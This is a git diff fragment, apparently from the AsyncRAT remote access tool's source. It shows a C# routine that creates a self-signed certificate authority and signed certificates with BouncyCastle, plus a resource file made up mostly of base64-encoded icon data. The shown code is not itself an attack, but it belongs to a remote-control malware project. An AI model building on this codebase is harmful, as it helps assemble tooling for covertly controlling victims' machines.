DotNetUtilities.GetKeyPair(ca.PrivateKey); + + ISignatureFactory signatureFactory = new Asn1SignatureFactory("SHA512WITHRSA", caKeyPair.Private, random); + + var certificate = certificateGenerator.Generate(signatureFactory); + + certificate.Verify(caCert.GetPublicKey()); + + var certificate2 = new X509Certificate2(DotNetUtilities.ToX509Certificate(certificate)); + certificate2.PrivateKey = DotNetUtilities.ToRSA(keyPair.Private as RsaPrivateCrtKeyParameters); + + return certificate2; + } + + public static X509Certificate2 CreateCertificateAuthority(string caName, int keyStrength) + { + var random = new SecureRandom(new CryptoApiRandomGenerator()); + var keyPairGen = new RsaKeyPairGenerator(); + keyPairGen.Init(new KeyGenerationParameters(random, keyStrength)); + AsymmetricCipherKeyPair keypair = keyPairGen.GenerateKeyPair(); + + var certificateGenerator = new X509V3CertificateGenerator(); + + var CN = new X509Name("CN=" + caName); + var SN = BigInteger.ProbablePrime(120, random); + + certificateGenerator.SetSerialNumber(SN); + certificateGenerator.SetSubjectDN(CN); + certificateGenerator.SetIssuerDN(CN); + certificateGenerator.SetNotAfter(DateTime.MaxValue); + certificateGenerator.SetNotBefore(DateTime.UtcNow.Subtract(new TimeSpan(2, 0, 0, 0))); + certificateGenerator.SetPublicKey(keypair.Public); + certificateGenerator.AddExtension(X509Extensions.SubjectKeyIdentifier, false, new SubjectKeyIdentifierStructure(keypair.Public)); + certificateGenerator.AddExtension(X509Extensions.BasicConstraints, true, new BasicConstraints(true)); + + ISignatureFactory signatureFactory = new Asn1SignatureFactory("SHA512WITHRSA", keypair.Private, random); + + var certificate = certificateGenerator.Generate(signatureFactory); + + var certificate2 = new X509Certificate2(DotNetUtilities.ToX509Certificate(certificate)); + certificate2.PrivateKey = DotNetUtilities.ToRSA(keypair.Private as RsaPrivateCrtKeyParameters); + + return certificate2; + } + } +} diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.resx new file mode 100644 index 0000000..f4aca47 --- /dev/null +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.resx @@ -0,0 +1,577 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + + + 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 + O//Yoln/1JhH/8R0Bv/DcQD5w3EAc8NxAADDcQAA3X0AAN19AADdfQCM3X0A/919AP/wxIz///////rt + 2//hjiP/3XwA/919AP/afAD/x3MA/8NxAP/DcAD/yX8a//Tl0f//////58eb/8RzA//DcQD/w3EAoMNx + AAHDcQAA3X0AAN19AALdfQCl3X0A/917AP/kmDb//PTq///////rs2r/3HsA/919AP/afAD/x3IA/8Nx + AP/CbwD/2KRc//79/P/89/H/0pVC/8JvAP/DcQD/w3EAuMNxAAfDcQAA3X0AAN19AAjdfQC83X0A/919 + AP/efwX/89Gk///////23r7/4IgV/96CCv/cgQr/yXgK/8V2Cv/HehH/7dOx///////t1LP/xXYK/8Nx + AP/DcQD/w3EAzcNxABHDcQAA3X0AAN19ABPdfQDR3X0A/919AP/dewD/56JJ//769P/++/j/+OPJ//ff + wf/238L/8d3C//Dcwf/y4Mf//fn1//78+v/XoVf/wm8A/8NxAP/DcQD/w3EA38NxAB7DcQAA3X0AAN19 + ACHdfQDi3X0A/919AP/dfQD/34MN//bbuv////////////////////////////////////////////Lg + x//HexP/w3AA/8NxAP/DcQD/w3EA7cNxAC/DcQAA3X0AAN19ADPdfQDv3X0A/919AP/dfQD/3XsA/+mt + Xv/+/fv//vv3/+/AhP/oq1z/26Zd/9+1ev/89/H//////92ub//CbwD/w3EA/8NxAP/DcQD/w3EA98Nx + AETDcQAA3X0AAN19AEjdfQD53X0A/919AP/dfQD/3XwA/+CIF//45cz//////+27ev/ZeAD/xW4A/9qp + Z///////9urZ/8qCIP/DcAD/w3EA/8NxAP/DcQD/w3EA/sNxAFvDcQAA3X0AAN19AGDdfQD/3X0A/919 + AP/dfQD/3X0A/918AP/tuHX///////nmzv/dhxb/ynkM/+/bvv//////4ryG/8NwAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAHTDcQAA3X0AAN19AHndfQD/3X0A/919AP/dfQD/3X0A/918AP/ijyT/+u3d///+ + /P/lp1b/15hE//369f/58uf/zosw/8JvAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAI7DcQAA3X0AAN19 + AJPdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/8MSM///////z17P/7c6l///////oyZ7/xHME/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAKfDcQAD3X0ABN19AKvdfQD/3X0A/919AP/dfQD/3X0A/919 + AP/dewD/5Jc0//z06v/+/Pn//vv3//z48v/TlkP/wm8A/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AL3DcQAL3X0ADd19AMHdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3n8F//PQo////////////+3V + tP/Fdgr/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxANHDcQAX3X0AGt19ANXdfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3XsA/+ahR//++fT//vz6/9iiWf/CbwD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAOLDcQAo3X0AJ919AN3dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/96D + DP/23Lv/8uLL/8d8FP/DcAD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAOjDcQA33X0ACN19 + AEXdfQCU3X0A1919APrdfQD/3X0A/919AP/dfQD/3X0A/917AP/pq1z/3Kxr/8JvAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAPvDcQDcw3EAm8NxAE3DcQAMAAAAAN19AADdfQAC3X0AG919AFbdfQCj3X0A4d19 + AP3dfQD/3X0A/919AP/cgQv/yXkN/8NwAP/DcQD/w3EA/8NxAP3DcQDlw3EAqsNxAF3DcQAfw3EAA8Nx + AAAAAAAAAAAAAAAAAAAAAAAA3X0AAN19AADdfQAE3X0AJN19AGTdfQCw3X0A5919AP3aewD/x3IA/8Nx + AP7DcQDrw3EAtsNxAGzDcQApw3EABcNxAADDcQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAA3X0AAN19AADdfQAI3X0ANd19AIXafADZx3MA3sNxAI3DcQA7w3EAC8NxAADDcQAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAA/4H/AP4AfwD8AD8A8AAPAMAAAwDAAAMAwAABAIAAAQCAAAEAgAABAIAA + AQCAAAEAgAABAIAAAQCAAAEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAADAPgAHwD/AP8AKAAAACAA + AABAAAAAAQAgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAE3n0AQdp8AL3IcwDKwnEAT8NxAAfDcQAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAB3X0AKN19AI/dfQDo23wA/8dzAP/DcQDvw3EAncNx + ADLDcQACw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0AG919AHrdfQDe3X0A/919AP/bfAD/x3MA/8Nx + AP/DcQD/w3EA5sNxAIjDcQAjw3EAAMNxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0AEN19AGPdfQDP3X0A/d19AP/dfQD/3X0A/9t8 + AP/HcwD/w3EA/8NxAP/DcQD/w3EA/sNxANnDcQByw3EAF8NxAADDcQAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0ACd19AE7dfQC93X0A+d19AP/dfQD/3X0A/919 + AP/dfQD/23wA/8dzAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAPzDcQDIw3EAW8NxAA3DcQAAw3EAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdfQAA3X0ABN19ADrdfQCo3X0A8919AP/dfQD/3X0A/919 + AP/dfQD/3X0A/919AP/bfAD/x3MA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD4w3EAtcNx + AEfDcQAHw3EAAAAAAAAAAAAAAAAAAAAAAADdfQAA3X0AAN19ACPdfQCS3X0A6919AP/cewD/3HsA/9x7 + AP/dfAD/3X0A/919AP/dfQD/3X0A/9t8AP/HcwD/w3EA/8NxAP/DcQD/w3EA/8NwAP/CbwD/wm8A/8Jv + AP/DcQD/w3EA8cNxAKDDcQAuw3EAAMNxAAAAAAAAAAAAAN19AADdfQAA3X0Akd19AP/dfAD/4IgV/+qx + Zv/stW7/67Rt/+KRKf/dfAD/3X0A/919AP/dfQD/23wA/8dzAP/DcQD/w3EA/8NxAP/DcAD/yoMh/9ys + a//drm7/3Kxq/8qBHP/DcAD/w3EA/8NxAKvDcQAEw3EAAAAAAAAAAAAA3X0AAN19AATdfQCv3X0A/918 + AP/fhhH/9+DC////////////8cmV/919Af/dfQD/3X0A/919AP/bfAD/x3MA/8NxAP/DcQD/w3EA/8Nw + AP/huYH////////////05tL/yYAb/8NwAP/DcQD/w3EAx8NxAA7DcQAAAAAAAAAAAADdfQAA3X0ADd19 + AMXdfQD/3X0A/917AP/rsWf///79///////67d3/4o4j/918AP/dfQD/3X0A/9t8AP/HcwD/w3EA/8Nx + AP/DcAD/yH0X//Tkz////////////+C1fP/CcAD/w3EA/8NxAP/DcQDaw3EAGsNxAAAAAAAAAAAAAN19 + AADdfQAZ3X0A2N19AP/dfQD/3XwA/+GLHP/56dP////////+/v/rs2r/3HsA/919AP/dfQD/23wA/8dz + AP/DcQD/w3EA/8JvAP/XoVf//vz6///////47uH/zIcp/8JwAP/DcQD/w3EA/8NxAOnDcQAqw3EAAAAA + AAAAAAAA3X0AAN19ACndfQDo3X0A/919AP/dfQD/3XwA/+69fv////////////bdvf/fhhL/3oAF/96A + Bv/bfwb/yHYG/8R0Bv/EdAX/xncM/+vQrP///////////+bDk//DcQL/w3EA/8NxAP/DcQD/w3EA9MNx + AD7DcQAAAAAAAAAAAADdfQAA3X0APN19APPdfQD/3X0A/919AP/dfAD/45Iq//vw4v///////vr2//be + v//12bX/9dm1//TZtf/v1rX/7ta1/+7Wtf/v2bv//Pjy///////79e3/0JE6/8JvAP/DcQD/w3EA/8Nx + AP/DcQD8w3EAVcNxAAAAAAAAAAAAAN19AADdfQBT3X0A+919AP/dfQD/3X0A/919AP/dfgL/8cmW//// + /////////////////////////////////////////////////////////////+vQqv/EdAf/w3EA/8Nx + AP/DcQD/w3EA/8NxAP/DcQBuw3EAAMNxAADdfQAA3X0AAN19AGvdfQD/3X0A/919AP/dfQD/3X0A/917 + AP/lmzz//fbu/////////////vr1//337//99/D//Pfw//v28P/8+fT////////////9+vb/1ZxP/8Jv + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAIfDcQAAw3EAAN19AADdfQAA3X0Ahd19AP/dfQD/3X0A/919 + AP/dfQD/3X0A/96ACP/01Kz////////////z0KT/5Jcz/+KXNP/SkDT/zowy/+TAjv////////////Db + v//GeQ//w3AA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EAocNxAAHDcQAA3X0AAN19AADdfQCf3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3XsA/+ilUP/++/b///////jmzv/ghxj/2nkA/8ZxAP/Fdgz/7ti5//// + ///+/fz/26ll/8JvAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQC4w3EAB8NxAADdfQAA3X0AB919 + ALbdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfAD/34UQ//ffwP///////v37/+msXP/aegD/xnEA/9KW + RP/8+PL///////Tm0v/Jfxv/w3AA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAM3DcQARw3EAAN19 + AADdfQAQ3X0AzN19AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dewD/6rBm///+/P//////9diy/9yA + Cf/HcwL/58aZ////////////4LZ9/8NwAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA38Nx + AB/DcQAA3X0AAN19AB3dfQDe3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/918AP/gihv/+ejS//// + ///99+7/4pg5/9CHJf/47uH///////ju4f/NiCn/wnAA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQDtw3EAMMNxAADdfQAA3X0ALt19AOzdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/918 + AP/uvH3////////////txI3/47R2////////////5sOV/8NyAv/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAPfDcQBEw3EAAN19AADdfQBD3X0A9t19AP/dfQD/3X0A/919AP/dfQD/3X0A/919 + AP/dfQD/3XwA/+KRKf/78OH///////vx5f/47d7///////v17f/Rkjv/wm8A/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/sNxAFzDcQAA3X0AAN19AFrdfQD93X0A/919AP/dfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0C//HIlP//////////////////////69Cs/8V1B//DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EAdcNxAADdfQAA3X0Ac919AP/dfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dewD/5Zo7//327f////////////369v/WnVD/wm8A/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQCOw3EAAN19AADdfQCM3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/egAf/9NSq////////////8NzA/8d5 + EP/DcAD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAKfDcQAD3X0AA919 + AKbdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/917AP/npE7//vr2//7+ + /f/bqmb/wm8A/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EAv8Nx + AAzdfQAF3X0Akt19APLdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3XwA/9+E + D//338H/9ejW/8mAG//DcAD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + APXDcQCnw3EAD919AADdfQAM3X0AOt19AIPdfQDL3X0A9d19AP/dfQD/3X0A/919AP/dfQD/3X0A/919 + AP/dfQD/3XsA/+uwZf/gtXv/w3AA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA+MNx + ANLDcQCNw3EAQsNxABDDcQAAAAAAAAAAAADdfQAA3X0AAN19ABLdfQBH3X0Ak919ANbdfQD53X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3YQQ/8t9FP/DcAD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD7w3EA3MNx + AJzDcQBQw3EAF8NxAAHDcQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAC3X0AGt19 + AFXdfQCi3X0A4N19APzdfQD/3X0A/919AP/aewD/x3IA/8NxAP/DcQD/w3EA/8NxAP3DcQDmw3EAq8Nx + AF/DcQAgw3EAA8NxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AADdfQAA3X0AAN19AATdfQAj3X0AY919AK/dfQDn3X0A/dt8AP/HcwD/w3EA/sNxAOvDcQC4w3EAbcNx + ACrDcQAGw3EAAMNxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0ACN19ADXdfQCD2nwA2MhzAN/DcQCPw3EAPcNx + AAzDcQAAw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/+B///+AH///A + A///AAD//AAAP/AAAA/gAAAH4AAAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAABwAAAAYAA + AAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAAAAAAAAAAAAACAAAAB8AAAB/wAAD//gAH///AP/ygA + AAAwAAAAYAAAAAEAIAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19 + AADdfQAE3n0AP9p8ALrIdADMwnEAU8NxAAnDcQAAw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AADdfQAA3X0AAd19ACbdfQCM3X0A5tt8AP/IcwD/w3EA8MNxAKHDcQA2w3EAA8NxAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAA3X0AAN19AADdfQAa3X0Ad919ANvdfQD+3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQDnw3EAjMNx + ACbDcQABw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAN19AADdfQAA3X0AD919AGDdfQDM3X0A/N19AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8Nx + AP/DcQD/w3EA/sNxANvDcQB2w3EAGcNxAADDcQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAA3X0AAN19AAjdfQBL3X0Aud19APjdfQD/3X0A/919AP/dfQD/3X0A/9t8 + AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD8w3EAy8NxAF/DcQAPw3EAAMNxAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAE3X0AON19AKXdfQDy3X0A/919AP/dfQD/3X0A/919 + AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAPjDcQC4w3EASsNx + AAjDcQAAw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdfQAA3X0AAd19ACjdfQCP3X0A6d19AP/dfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA8sNxAKTDcQA3w3EAA8NxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3X0AAN19AADdfQAa3X0AeN19ANzdfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQDow3EAjsNxACfDcQABw3EAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0AEN19AGLdfQDN3X0A/d19 + AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/sNxANzDcQB3w3EAGsNx + AADDcQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3X0AAN19AAndfQBN3X0Au919 + APndfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/9t8 + AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD8w3EAzMNxAGHDcQAQw3EAAMNxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdfQAA3X0AB919 + AJDdfQD03X0A/919AP/dfQD/3X0B/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919 + AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EB/8NxAP/DcQD/w3EA/8NxAPnDcQCuw3EAFcNxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AADdfQAA3X0AGN19ANbdfQD/3X0A/919AP/dfgP/67Fn//LOn//yzJz/8syc//LNnv/npU//3XwA/919 + AP/dfQD/3X0A/919AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/wnAA/9GS + PP/ox5v/6Mic/+jInP/oyZ7/37N4/8V2Cf/DcQD/w3EA/8NxAP/DcQDuw3EAM8NxAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAADdfQAA3X0AJ919AObdfQD/3X0A/919AP/dfAD/6rBl///9/P////////////// + ///23b3/34MN/919AP/dfQD/3X0A/919AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/xHME/+nLov//////////////////////4rmC/8NxAP/DcQD/w3EA/8NxAP/DcQD4w3EAR8Nx + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdfQAA3X0AOt19APLdfQD/3X0A/919AP/dfAD/4IkZ//nm + z//////////////////9+PL/5p9D/917AP/dfQD/3X0A/919AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8Nx + AP/DcQD/w3EA/8NxAP/CcAD/zYks//nw5P/////////////////47+L/zYks/8JwAP/DcQD/w3EA/8Nx + AP/DcQD+w3EAX8NxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdfQAA3X0AUN19APrdfQD/3X0A/919 + AP/dfQD/3XwA/+26ef//////////////////////8cmV/919Af/dfQD/3X0A/919AP/dfQD/3X0A/9t8 + AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/CcAD/37N3///////////////////////mxZf/w3IC/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EAeMNxAADDcQAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0AaN19 + AP/dfQD/3X0A/919AP/dfQD/3XwA/+KQJ//77t7/////////////////+u3c/+KOI//dfAD/3X0A/919 + 